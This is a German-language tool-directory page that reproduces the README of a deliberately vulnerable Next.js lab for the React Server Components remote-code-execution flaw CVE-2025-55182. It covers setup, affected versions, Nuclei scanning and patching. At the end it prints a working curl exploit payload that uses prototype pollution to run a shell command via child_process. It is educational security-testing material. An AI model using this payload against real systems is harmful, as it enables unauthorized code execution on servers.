Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
React2Shell-CVE-2025-55182-Testing-Environment — Eine containerisierte Testumgebung für CVE-2025-55182, eine kritische (10.0 CVSS) Remote Code Execution Schwachstelle in React Server Components. | Kitploit
Tools/GitHubGitHub/abcfabian/react2shell-cve-2025-55182-testing-environment
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubabcfabian/react2shell-cve-2025-55182-testing-environment

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

React2Shell-CVE-2025-55182-Testing-Environment

Eine containerisierte Testumgebung für CVE-2025-55182, eine kritische (10.0 CVSS) Remote Code Execution Schwachstelle in React Server Components.

Repository anzeigen
1vor 8 MonatenNoch nicht geprüft

React2Shell (CVE-2025-55182) Testumgebung

Eine containerisierte Testumgebung für CVE-2025-55182, eine kritische (10.0 CVSS) Remote-Codeausführungs-Schwachstelle in React Server Components.

⚠️ WARNUNG

Diese Umgebung ist absichtlich angreifbar und sollte NUR verwendet werden für:

  • Sicherheitsforschung und -bildung
  • Penetrationstests in isolierten Umgebungen
  • Verständnis der Schwachstellenmechanik

NICHT:

  • In der Produktion bereitstellen
  • Dem Internet aussetzen
  • Für böswillige Zwecke nutzen

Schwachstellendetails

  • CVE: CVE-2025-55182 (React), CVE-2025-66478 (Next.js)
  • Schweregrad: Kritisch (10.0)
  • Typ: Unauthenticated Remote Code Execution
  • Betroffen: React Server Components in Next.js 15.x/16.x App Router
  • Schwäche: CWE-502 (Deserialisierung von nicht vertrauenswürdigen Daten)

Betroffene Versionen

React-Pakete:

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0

Next.js:

  • 15.0.0 - 15.0.4
  • 15.1.0 - 15.1.8
  • 15.2.0 - 15.2.5
  • 15.3.0 - 15.3.5
  • 15.4.0 - 15.4.7
  • 15.5.0 - 15.5.6
  • 16.0.0 - 16.0.6

Gepatches Versionen

React: 19.0.1, 19.1.2, 19.2.1 Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

Schnellstart

Mit Podman (macOS)

root@kitploit:~
# Build and start the vulnerable environment
podman compose up --build -d

# Check it's running
curl http://localhost:3000/api/status

# View logs
podman logs -f react2shell-vuln

# Stop
podman compose down

Mit Docker Compose

root@kitploit:~
# Build and start the vulnerable environment
docker-compose up --build -d

# Access the application at http://localhost:3000

Projektstruktur

root@kitploit:~
.
├── README.md               # Diese Datei
├── Dockerfile              # Container-Build-Anweisungen
├── Dockerfile.dev          # Entwicklungscontainer mit Hot Reload
├── docker-compose.yml      # Docker/Podman Compose-Konfiguration
├── CVE-2025-55182.yaml     # Nuclei-Scanner-Vorlage
├── scan.sh                 # Allgemeines Nuclei-Scanner-Skript
├── scan-results/           # Scan-Ausgabeverzeichnis
└── vulnerable-app/         # Angreifbare Next.js-Anwendung
    ├── package.json        # Abhängigkeiten (anfällige Versionen)
    ├── next.config.js      # Next.js-Konfiguration
    ├── tsconfig.json       # TypeScript-Konfiguration
    └── app/                # App Router Seiten und Komponenten
        ├── layout.tsx      # Root-Layout
        ├── page.tsx        # Hauptseite mit Server Components
        ├── globals.css     # Stile
        ├── actions.ts      # Server Actions
        ├── api/status/     # Status-API-Endpunkt
        └── components/     # React-Komponenten

Scannen nach der Schwachstelle

Nuclei-Vorlage herunterladen

Falls Sie die Vorlage nicht haben, laden Sie sie aus dem offiziellen nuclei-templates-Repository herunter:

root@kitploit:~
curl -o CVE-2025-55182.yaml https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2025/CVE-2025-55182.yaml

Das Scanner-Skript verwenden

Das enthaltene scan.sh ist ein allgemeiner Nuclei-Container-Scanner, der sowohl mit Docker als auch mit Podman funktioniert.

root@kitploit:~
# Die lokale angreifbare App scannen
./scan.sh -u http://host.docker.internal:3000 -t CVE-2025-55182.yaml -v

# Beliebiges Ziel scannen
./scan.sh -u https://example.com -t CVE-2025-55182.yaml

# Mit allen Nuclei-Vorlagen scannen
./scan.sh -u https://example.com

# Mehrere Ziele aus einer Datei scannen
./scan.sh -l targets.txt -t CVE-2025-55182.yaml

# Nach Schweregrad filtern
./scan.sh -u https://example.com -s critical,high

# JSON-Ausgabe
./scan.sh -u https://example.com -t CVE-2025-55182.yaml -j

Scanner-Optionen

Manueller Nuclei-Scan (Podman)

root@kitploit:~
podman run --rm \
    -v "$(pwd)/CVE-2025-55182.yaml:/templates/CVE-2025-55182.yaml:ro" \
    docker.io/projectdiscovery/nuclei:latest \
    -t /templates/CVE-2025-55182.yaml \
    -u "http://host.docker.internal:3000" \
    -v

Testen der Schwachstelle

Sobald der Container läuft:

  1. Rufen Sie die Anwendung unter http://localhost:3000 auf
  2. Überprüfen Sie die Status-API: http://localhost:3000/api/status
  3. Führen Sie den Scanner aus, um die Erkennung der Schwachstelle zu verifizieren
  4. Die Anwendung verwendet React Server Components über den Next.js App Router

Hinweis: Die Schwachstelle betrifft unsichere Deserialisierung im RSC-Protokoll. Die Nuclei-Vorlage testet diesen spezifischen Angriffsvektor.

Umschalten auf die gepatche Version

Um die gepatche Version zu testen, ändern Sie vulnerable-app/package.json:

root@kitploit:~
{
  "dependencies": {
    "next": "15.5.7",
    "react": "^19.1.2",
    "react-dom": "^19.1.2"
  }
}

Dann neu bauen:

root@kitploit:~
# Podman
podman compose down
podman compose up --build -d

# Docker
docker-compose down
docker-compose up --build

Referenzen

  • React Security Advisory
  • Next.js Security Advisory
  • React Blog Post
  • react2shell.com
  • Nuclei Templates

Haftungsausschluss

Diese Testumgebung dient ausschließlich Bildungs- und Sicherheitsforschungszwecken. Die Betreuer übernehmen keine Verantwortung für Missbrauch dieser Software. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie Sicherheitsschwachstellen testen.

Curl-Exploit-Beispiel

root@kitploit:~
curl -X POST http://localhost:3000 \
  -H "Next-Action: x" \
  -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary" \
  -H "X-Nextjs-Request-Id: test123" \
  --data-binary $'------WebKitFormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\n{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\\"then\\":\\"$B1337\\"}",
  "_response": {
    "_prefix":"var res=process.mainModule.require(\'child_process\').execSync(\'id\').toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name="2"\r\n\r\n[]\r\n------WebKitFormBoundary--' \
  -i 2>&1 | grep -i "x-action-redirect"
Tool herunterladen
OptionBeschreibung
-u, --url <url>Einzelne Ziel-URL zum Scannen
-l, --list <file>Datei mit Liste der Ziel-URLs
-t, --template <file>Benutzerdefinierte Vorlagendatei oder -verzeichnis
-o, --output <dir>Ausgabeverzeichnis (Standard: ./scan-results)
-s, --severity <level>Filter: info, low, medium, high, critical
-r, --rate-limit <n>Maximale Anfragen pro Sekunde
-j, --jsonErgebnisse im JSON-Format ausgeben
-v, --verboseAusführliche Ausgabe
-h, --helpHilfemeldung anzeigen